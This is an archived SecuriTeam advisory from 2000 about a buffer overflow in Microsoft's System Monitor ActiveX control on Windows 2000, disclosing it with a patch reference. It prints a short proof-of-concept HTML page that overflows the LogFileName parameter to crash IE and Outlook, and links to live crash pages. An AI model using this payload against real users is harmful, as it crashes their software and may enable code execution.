Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam™ in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	Additional details on the System Monitor ActiveX buffer overflow 6 Nov. 2000    Summary The USSR Team has found a vulnerability in the Microsoft System Monitor ActiveX control (class id: C4D2D8E0-D1DD-11CE-940F-008029004347, sysmon.ocx). The Value field name "LogFileName" could be used by a malicious web server operator to potentially run code on a visiting user's machine. The vulnerability can only be exploited if ActiveX controls are enabled in Internet Explorer, Outlook or Outlook Express.   Credit: The information has been provided by USSR Labs.    Details Audit your web server for security holes - see what the hackers see. Sign up for a scan today - risk free! Vulnerable systems: Microsoft Windows 2000 Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Example exploit page: <HTML> <BODY> <OBJECT ID="DISystemMonitor1" WIDTH="100%" HEIGHT="100%" CLASSID="CLSID:C4D2D8E0-D1DD-11CE-940F-008029004347">         <PARAM NAME="LogFileName" VALUE="aaaaaaaaaa[20000 'a']" </OBJECT> </BODY> </HTML> If a user accesses an HTML page with the above code, IE, Outlook and Outlook Express will crash. The following error message will appear in the event log: "Application popup: iexplore.exe - Application Error : The instruction at "0x64a8e132" referenced memory at "0x006100dd". The memory could not be "written". Online examples: Warning: Visiting the following pages might cause your browser to crash. http://www.ussrback.com/microsoft/msmactivex.html http://www.ussrback.com/microsoft/msmactivex2.html Patch: For more information about a patch for this vulnerability see our previous article: ActiveX Parameter Validation vulnerability (Patch available)  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles AVTECH PageR Enterprise Directory Traversal Google Chrome Browser Automatic File Download Novell iPrint Client nipplib.dll "IppCreateServerRef()" Buffer Overflow Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks Kyocera Mita Scanner File Utility (Multiple) Novell iPrint Client ActiveX Control Multiple Vulnerabilities DriveCrypt Security Model Bypass and Incorrect BIOS API Usage Windows Media Services (nskey.dll) CallHTMLHelp Buffer Overflow Trend Micro Products Web Management Authentication Bypass Anzio Web Print Object Buffer Overflow Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass (MS08-043) Microsoft Windows Messenger Illegal Access Vulnerability (MS08-050) MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface Symantec Veritas Storage Foundation Scheduler Service NULL Session Authentication Bypass Vulnerability Vulnerability in Cisco WebEx Meeting Manager ActiveX Control  Featured Articles Google Chrome Browser Automatic File Download Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks vBulletin Cross Site Scripting Vulnerability (popup) Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass (MS08-043) MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface Sun xVM VirtualBox Privilege Escalation Vulnerability Vulnerabilities in DNS Allows Spoofing (MS08-037)
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®